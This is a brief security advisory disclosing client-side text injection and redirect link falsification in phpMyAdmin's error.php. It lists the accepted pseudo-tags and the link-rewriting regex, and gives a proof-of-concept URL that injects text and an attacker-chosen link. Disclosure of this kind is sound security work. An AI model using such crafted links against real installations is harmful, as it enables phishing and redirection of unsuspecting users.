phpMyAdmin suffers from client side code injection and redirect link falsification vulnerabilities.
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PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification
Credits:
Emanuele 'emgent' Gentili <emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini <white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia <scox@backtrack.it>
In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.
With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.
Available tags are:
'[i]' => '<em>',
'[/i]' => '</em>',
'[em]' => '<em>',
'[/em]' => '</em>',
'[b]' => '<strong>',
'[/b]' => '</strong>',
'[strong]' => '<strong>',
'[/strong]' => '</strong>',
'[tt]' => '<code>',
'[/tt]' => '</code>',
'[code]' => '<code>',
'[/code]' => '</code>',
'[kbd]' => '<kbd>',
'[/kbd]' => '</kbd>',
'[br]' => '<br />',
'[/a]' => '</a>',
'[sup]' => '<sup>',
'[/sup]' => '</sup>',
and replace '/\[a@([^"@]*)@([^]"]*)\]/' with '<a href="\1" target="\2">'
POC:
http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]
OWASP Reference:
http://www.owasp.org/index.php/Unvalidated_Input